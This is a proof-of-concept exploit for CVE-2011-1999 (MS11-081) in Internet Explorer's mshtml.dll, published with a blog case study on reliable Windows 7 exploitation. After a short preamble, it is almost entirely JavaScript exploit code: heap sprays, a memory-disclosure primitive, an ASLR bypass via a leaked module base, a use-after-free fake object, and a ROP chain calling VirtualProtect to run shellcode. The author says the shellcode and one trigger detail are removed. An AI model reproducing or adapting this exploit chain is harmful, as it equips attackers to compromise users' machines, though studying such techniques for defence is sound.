Reliable Windows 7 Exploitation: A Case Study



Below is the PoC code for CVE-2011-1999 (MS11-081) that accompanies my
blog article
"Reliable Windows 7 Exploitation: A Case Study"
http://ifsec.blogspot.com/2012/02/reliable-windows-7-exploitation-case.html

Some notes about the PoC code:
- The exploit uses a single vulnerability to both bypass ASLR and
execute the payload without requiring any non-ASLR module in memory.
- One tiny detail required for triggering the vulnerability has been
removed, so the exploit (as given below) should not work, even on
vulnerable systems. No, I won't tell you what it is. Sorry kids, this
is for educational purposes only.
- All offsets in the code were correct for mshtml.dll at the time
this exploit code was written. As some time has passed between then
and the time the vulnerability was patched, they won't be correct for
many vulnerable versions of this module. Writing the exploit that
doesn't rely on any hardcoded offsets is left as an exercise for the
reader (more difficult, but certainly possible with the combination of
the techniques used in the PoC below).



<html>
<head>
</head>

<body>


<script type="text/javascript">
<!--

//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";

var newstack,newstackaddr;
var fakeobj;

var spray,spray2,selarray,readindex,readaddr,optarryaddr;
var elms = new Array();

var optarray;

var mshtmlbase;

//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;

function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

function inttostr(num) {
return String.fromCharCode(num%65536,Math.floor(num/65536));
}

function crash() {
var o = new Option();
selarray[99].options.add(o,-0x20000000);
}

function readmem(addr) {
if(addr < readaddr) alert("Error, can't read that address");
return strtoint(spray[readindex].substr((addr-readaddr)/2,2));
}

function readmem2(addr,size) {
if(addr < readaddr) alert("Error, can't read that address");
return spray[readindex].substr((addr-readaddr)/2,size/2);
}

function overwrite(addr) {
try {
var index = (addr-optarryaddr)/4 - 0x40000000;
selarray[99].options.add(optarray.pop(),index);
} catch(err) {}
}

function getreadaddr() {
readaddr = 0;
var indexarray = new Array();
var tmpaddr = 0;
var i,index;

index = readmem(tmpaddr);
indexarray.push(index);

while(1) {
tmpaddr += 0x100000;
index = readmem(tmpaddr);
for(i=0;i<indexarray.length;i++) {
if(indexarray[i]==index+1) {
readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
return 1;
} else if(indexarray[i]==index-1) {
readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
return 1;
}
}
indexarray.push(index);
}
}

//leverages the vulnerability into memory disclosure
function initread() {
//overwrite something in a heap spray slide
try {
selarray[99].options.add(optarray.pop(),-100000000/4);
} catch(err) {}

//now find what and where exectly did we overwrite
readindex = -1;
var i;
for(i=1;i<200;i++) {
if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2))
{
readindex = i;
break;
}
}

if(readindex == -1) {
alert("Error overwriring first spray");
return 0;
}

var start=2,len=spray[readindex].length-2,mid;
while(len>10) {
mid = Math.round(len/2);
mid = mid - mid%2;
if(spray[readindex].substr(start,mid) !=
spray[readindex-1].substr(start,mid)) {
len = mid;
} else {
start = start+mid;
len = len-mid;
//if(spray[readindex].substr(start,mid) ==
spray[readindex-1].substr(start,mid)) alert("error");
}
}

for(i=start;i<(start+20);i=i+2) {
if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
break;
}
}

//overwrite the string length
try {
selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1);
} catch(err) {}

if(spray[readindex].length == spray[readindex-1].length) alert("error
overwriting string length");

//readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;
getreadaddr();

optarryaddr = readaddr + 100000000 + i*2;

return 1;
}

function trysploit() {
//create some helper objects
for(var i =0; i < 100; i++) {
elms.push(document.createElement('div'));
}

//force the option cache to rebuild itself
var tmp1 = selarray[99].options[70].text;

//overwrite the CTreeNode pointer
overwrite(corruptaddr);
//read the address of the option object we overwrited with
var optadr = readmem(corruptaddr);
//delete the option object...
selarray[99].options.remove(0);

CollectGarbage();

//...and allocate some strings in its place
for(var i = 0; i < elms.length; i++) {
elms[i].className = fakeobj;
}

//verify we overwrote the deleted option object successfully
if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;

alert("success, calc.exe should start once you close this message box");

//now do something with the corrupted option object
corruptedoption.parentNode.click();
}

function hs() {

//first heap spray, nop slide + shellcode
spray = new Array(200);
var pattern = unescape("%u0C0C%u0C0C");
while(pattern.length<(0x100000/2)) pattern+=pattern;
pattern = pattern.substr(0,0x100000/2-0x100);
for(var i=0;i<200;i++) {
spray[i] = [inttostr(i)+pattern+scode].join("");
}

//fill small gaps, we wan everything _behind_ our heap spray so that
we can read it
var asmall = new Array(10000);
pattern = "aaaa";
while(pattern.length<500) pattern+=pattern;
for(var i=0;i<10000;i++) {
asmall[i]=[pattern+pattern].join("");
}

//create some select and option elements
selarray = new Array(100);
for(var i=0;i<100;i++) {
selarray[i] = document.createElement("select");
for(var j=0;j<100;j++) {
var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
selarray[i].options.add(o,0);
}
}

//create some extra option elements
optarray = new Array(10000);
for(var i=0;i<10000;i++) {
optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
}

//enable memory disclosure
if(initread()==0) return;

//force the option cache to rebuild itself
var tmp1 = selarray[99].options[60].text;

//get the address of some option element to be corrupted, also remove
it from its select element, we don't want anything else messing with
it
corruptedoptionaddr = readmem(optarryaddr+60*4);
corruptedoption = selarray[99].options[60];
selarray[99].options.remove(60);

//get the base address of mshtml.dll based on the vtable address
inside the option object
mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;
alert("base address of mshtml.dll : " + mshtmlbase.toString(16));

//we'll overwrite the pointer to the CTreeNode object, compute its address
corruptaddr = corruptedoptionaddr+0x14;

//second heap-spray, this one will act as a stack (we'll exchange
stack pointer with a pointer into this)
spray2 = new Array(200);

//some address that is likely to be inside the "stack"
newstackaddr = optarryaddr+100000000;
newstackaddr-=newstackaddr%0x1000;
newstackaddr+=0x24;

//assemble the "stack" so that it calls VirtualProtect on the firs
shellcode and then jumps into it through return-oriented-programming
newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);
while(newstack.length<(0x1000/2))
newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA");
newstack = newstack.substr(0,0x1000/2);
while(newstack.length<(0x100000/2)) newstack+=newstack;
newstack = newstack.substr(0,0x100000/2-0x100);
for(var i=0;i<200;i++) {
spray2[i] = [newstack].join("");
}

//constract a fake object which will replace a deleted option object
(it has to be the same size)
//fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");

//loop until we either achieve command execution or fail
for(var i=0;i<100;i++) {
trysploit();
}

alert("Exploit failed, try again");

}


hs();


-->
</script>


</body>
</html>